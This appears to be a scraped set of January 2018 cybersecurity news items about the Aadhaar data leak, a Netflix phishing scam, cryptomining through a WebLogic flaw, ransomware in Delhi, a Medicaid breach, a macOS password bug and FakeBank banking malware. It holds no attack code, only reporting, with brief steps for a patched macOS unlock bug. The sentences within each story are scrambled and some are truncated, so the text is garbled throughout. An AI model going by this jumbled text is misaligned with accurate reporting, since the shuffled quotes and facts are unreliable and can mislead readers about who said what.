Despite UIDAI denial, leaked Aadhaar demographic data is a goldmine for criminals, say experts
The news report in The Tribune newspaper that exposed the security breach said that it took a reporter only Rs 500 and 10 minutes to access the entire Aadhaar database and its trove of demographic details – such as names, addresses, postal codes, phone numbers, photographs and e-mail addresses of people enrolled in the programme. Another form of phishing is when criminals send their targets emails or text messages disguised to look like they are from a reliable source, but which include links to malicious websites designed to give the criminal access to the victim’s electronic devices and the security-related data they contain. One of the forms social engineering takes is phishing, a process in which criminals phone their targets pretending to be credible persons like bank officials and get them to reveal confidential information. “Demographic data is largely private data and there is a tremendous amount of risk associated with the unauthorised access of such data,” he said. “If demographic information of such a massive scale has been exposed, imagine the sample size of data that such criminals can [now] use to evaluate the behaviour of their targets as part of the social engineering process,” said Chaudhary. Resource for criminals Despite the Unique Identification Authority of India claim that individual security could not be compromised by unauthorised access of the sort reported by the Tribune, Pavan Duggal, a lawyer who specialises in cybersecurity, disagreed. Chaudhary explained that criminals usually initiate financial fraud via a tactic known as social engineering in which they attempt to manipulate people on the phone or online to reveal confidential information such as passwords or bank details. “It is a goldmine for criminals, in both physical and virtual spaces, who can target any individual through such private data. ” Duggal added: “The availability of demographic data eventually leads to the violation of the right to privacy. It can also act as fodder for groups indulging in financial frauds.”
Aadhaar based on flawed technology, prone to data breach, SC told
The December interim order had come on pleas for the stay on various notifications issued by the government making Aadhaar-linking mandatory with 139 various services and schemes. Menon submitted that it gave rise to “surveillance, breach of privacy and identity theft of individuals” in violation of their right to equality, right to freedom and right to privacy. Filed ahead of the January 17 Constitution Bench hearing of petitions challenging the validity of the Aadhaar Act, the affidavit cited research done by various experts and RTI replies to suggest that the scheme was flawed. While choosing not to stay the government’s orders and notifications on Aadhaar, it had fixed January 17 for final Constitution Bench hearing to decide the petitions challenging the validity of Aadhaar Act and related notifications. The order extending the deadline for linking of Aadhaar shall also be applicable to all state governments, besides the Central government and its departments, the top court had said. Amid rising concerns over violation of the right to privacy due to Aadhaar, a petitioner against the 12-digit unique biometric identification number has told the Supreme Court that it is based on a flawed technology, making it prone to a data breach. A five-judge Constitution Bench headed by Chief Justice of India Dipak Misra had said the deadline for Aadhaar-linking of mobile phone numbers stood extended from February 6, 2018, to March 31, 2018. The Supreme Court had on December 15 extended the deadline for linking of Aadhaar for all services and schemes, including mobile phone numbers, to March 31 next year. These data breaches are in flagrant violation of Section 29 of the Aadhaar Act read with Regulations 6 and 7 of the Aadhaar (Sharing of Information) Regulations, 2016,” writer-activist Kalyani Shankar Menon said in her rejoinder affidavit. “It is submitted that Aadhaar is an insecure, unreliable, unnecessary and inappropriate technology project which is being foisted with coercion on the most vulnerable section of Indians and is threatening their constitutional and legal rights and entitlements every day,” the affidavit read.
Watch out for this Netflix phishing scam that will steal your credit card details
Netflix users are being warned to avoid clicking on any suspicious email links after a phishing scam was uncovered, which security experts say is designed to steal credit card details. Found by Australian cybersecurity firm MailGuard, and shared on Twitter by the New South Wales police, the fake emails use convincing social engineering tactics – including the official Netflix website layout – in an attempt to dupe recipients into entering financial details. An ‘update payment’ button in the email, if clicked, will lead to a phishing site with bogus Netflix branding. Unfortunately, these scams are common on the internet and target popular brands such as Netflix and other companies with large customer bases to lure users into giving out personal information. If you’re unsure if you’re visiting our legitimate Netflix website, type www. au in a statement: “We take the security of our members’ accounts seriously and Netflix employs numerous proactive measures to detect fraudulent activity to keep the Netflix service and our members’ accounts secure. It states: “Never enter your login or financial details after following a link in an email or text message. Netflix has become a favourite vehicle for email fraudsters,” MailGuard’s Emmanuel Marshall wrote in a blog post-Wednesday (10 January. Phishing can be enormously costly and destructive, and new scams are appearing every day. Any card details entered will be sent directly to the hackers.
Hackers exploit critical Oracle WebLogic flaw to secretly mine cryptocurrency worldwide
Multiple hackers are exploiting a web server vulnerability that was patched by Oracle late last year to secretly mine thousands of dollars worth of cryptocurrency, security researchers have found. According to a report published by the SANS Technology Institute, Morphus Labs researcher Renato Marinho said the easily exploitable Oracle WebLogic vulnerability, dubbed CVE-2017-10271, was fixed in October last year but continues to be exploited on systems which have not installed the patch. The attacks are thought to have begun after Chinese security researcher Lian Zhang published a proof-of-concept exploit in December, Johannes B Ullrich, dean of research at the SANS Technology Institute, said in a follow-up post. WebLogic and PeopleSoft servers that have still not installed the patch are being targeted in this attack. Researchers said the xmrig mining software was found on 722 vulnerable WebLogic and PeopleSoft systems. Once the exploit was published, anybody with limited scripting skills was able to participate in taking down WebLogic/PeopleSoft servers. Your server was vulnerable to an easily executed remote code execution exploit,” he said. One attacker has already managed to mine 611 Monero coins ($242,762, £179,411 at current rates) so far, researchers said. In this attack, a simple bash script is used to find a working directory, kill any existing cryptominers on the targeted system and set up a CRON job to download and launch the new miner. They also noted the attacks were launched from different locations across the globe, with many of the affected servers hosted by major cloud service providers such as Amazon Web Services, Digital Ocean, Google Cloud, Microsoft Azure, Oracle Cloud and OVH.
Hackers hit traders in Old Delhi, demand Bitcoin as ransom
At least three traders in Old Delhi were hit by hackers who encrypted files on their computers and demanded ransom in Bitcoins to release documents critical to their businesses, police officers and victims said on Wednesday. Delhi Police’s crime branch has registered three FIRs so far, including one on January 5, but traders say the number could be much more as several ransoms paid in Bitcoins were not reported to authorities. A police officer said the free option was to demonstrate to the traders that the hackers had control. Police said the traders were given links to buy Bitcoins, with a warning that not complying with their demand would lead to the permanent loss of data. The traders were given the option of getting five files decrypted for free, and the rest after the ransom was paid. “Some traders paid in Bitcoins and got their data back. Deputy commissioner of police (crime) Bhishma Singh confirmed the hackings but declined to give further details. Bitcoins are gaining in popularity as a digital payment mode but are not legal tender in India. When my data was hacked, I spoke to fellow traders and learnt that there were other such cases. Getting money in Bitcoin works for them because it is difficult to trace the money,” said Jiten Jain, the director of cyber-security firm Voyager Infosec.
What is CoffeeMiner? New attack lets hackers hijack public WiFi networks to mine cryptocurrency
Florida hack exposes 30,000 Medicaid patients’ confidential records, medical conditions and diagnoses
Florida’s Agency for Health Care Administration said hackers may have accessed the personal and confidential information of up to 30,000 Medicaid patients, including their medical records, conditions and diagnoses. The agency takes this matter very seriously and have taken steps to protect personal information and the Agency took swift action to help prevent this type of event from happening again,” the AHCA said. According to preliminary findings from the ongoing investigation, Medicaid enrollees’ full names, Medicaid ID numbers, dates of birth, addresses, Social Security numbers and medical conditions and diagnoses may have been partially or fully accessed in the breach. Although the review is ongoing, the agency believes that only approximately 6% of these individuals could be confirmed as having their Medicaid ID or social security numbers potentially accessed. The agency said it learned of the incident five days later on 20 November and notified the Inspector General who launched an investigation “to identify if any protected health information was potentially accessed. In addition to a full review of AHCA data to determine the circumstances of the breach, the agency has initiated “new and ongoing security training” for employees to ensure proper security protocol and measures. It has also provided Medicaid recipients with an agency hotline number to call. The AHCA said no other agency systems or email accounts were involved in the phishing attack. However, the agency said it currently has “no reason to believe” that the information has been misused. The AHCA is currently notifying all potentially affected Medicaid enrollees and is “exploring additional security options to protect against further breaches.
MacOS High Sierra security bug lets you unlock App Store System Preferences with any random password
Yet another password security flaw has been found affecting macOS High Sierra for the second time in three months. If it is unlocked, lock it and then try unlocking it using your username and any password. Although this vulnerability is not as serious as earlier password bugs plaguing High Sierra, it could potentially allow a malicious actor to disable automatic security updates on the device and exploit any bugs and vulnerabilities that would otherwise be regularly patched. The bug report also highlights yet another embarrassing password-related bug for Apple. 2 – that allows any user to unlock the App Store menu in System Preferences using any random password in less than five steps, MacRumors first reported. A bug report on Open Radar submitted earlier this week detailed a security flaw found in the current version of macOS High Sierra – version 10. In November last year, a serious “root” flaw was discovered in macOS High Sierra that allowed anyone to log into the admin account simply by using the username “root” with a blank password after repeatedly clicking on the login button multiple times. According to the bug report, users can simply open System Preferences, go to App Store settings and check the padlock icon. Using this preference pane, users can choose to enable or disable automatic downloads and installation of OS security updates among other things. We greatly regret this error and we apologize to all Mac users, both for releasing with this vulnerability and for the concern it has caused.
What is FakeBank? New banking malware can intercept SMS messages to steal sensitive data and funds
After the malware is installed, the icon appears on the device screen and requests admin privileges from the user Trend Micro “FakeBank also stops the user from opening the target bank’s legitimate app, to prevent any modifications to the relationship between the bank card number and your phone number,” the researchers said. New banking malware can intercept SMS messages to steal sensitive data and funds Security researchers have discovered a mobile malware strain that can intercept users’ sensitive SMS messages to steal their banking details and funds. FakeBank can also steal sensitive information from the device including users’ phone numbers, a list of banking apps installed, the balance on a linked bank card and location data. Since many users link their bank accounts to their phones and opt to receive text notifications, the malware can take over these messages to steal sensitive bank account information, such as security code messages. Most significantly, all this access to the device’s SMS gives the malware an avenue to silently steal money from users’ bank account. The researchers have observed the malware targeting customers of numerous Russian financial institutions such as Sberbank, Leto Bank and VTB24 Bank. The researchers observed some samples of the malware requesting admin privileges from the user, therefore allowing the malicious app further access to the compromised device. The malware intercepts SMS in a scheme to steal funds from infected users through their mobile banking systems,” Trend Micro said in a blog post published on Wednesday (10 January. Besides controlling the device’s open and close network function, the malicious app can quietly connect to the internet and send the stolen information to its command and control server (C&C) without the user’s knowledge. To ensure it carries out its malicious activities successfully, the malware prevents users from opening device settings “likely to prevent installation”, the researchers said. It also inspects the device for any anti-virus software and quietly exits without doing anything if it does find one.
Hyderabad: India 5th in cyber fraud vulnerability Hyderabad
The world lost $3 trillion to cyber fraud in 2016, and India is ranked fifth among the most vulnerable countries, while the USA tops the list. ” Nilesh Kumar, the research scholar in cybersecurity, said that data leaks like Aadhaar, bank account and other personally identifiable information are going to grow as long as different institutions that store personal data don’t secure it. Umesh Thota, CEO, AuthBase, a cyber expert, said, “Every company in the US and other countries has a portion of its IT budget allocated to cybersecurity. The Union home ministry and state governments are spending money on training personnel to carry out digital investigations, as a survey by an international agency has estimated that the damage due to cyber fraud is likely to increase to $6 trillion by 2021. There are numerous perpetrators of cybercrime, from full-fledged gangs to individuals trying to poach identification and security details of a largely unaware and ignorant Indian audience. Data is also harvested by fake sites purporting to be e-commerce sites. Unless people use secure mail gateways, their conversations can be eavesdropped and eventually this can be used to cheat people of their money. Secondly, ignorance is one of the major reasons why cybercrime is so high in India. To deal with cyber crimes, the Telangana home department is training personnel in ‘Digital investigation. Also CCTV probing, data security is part of the training module.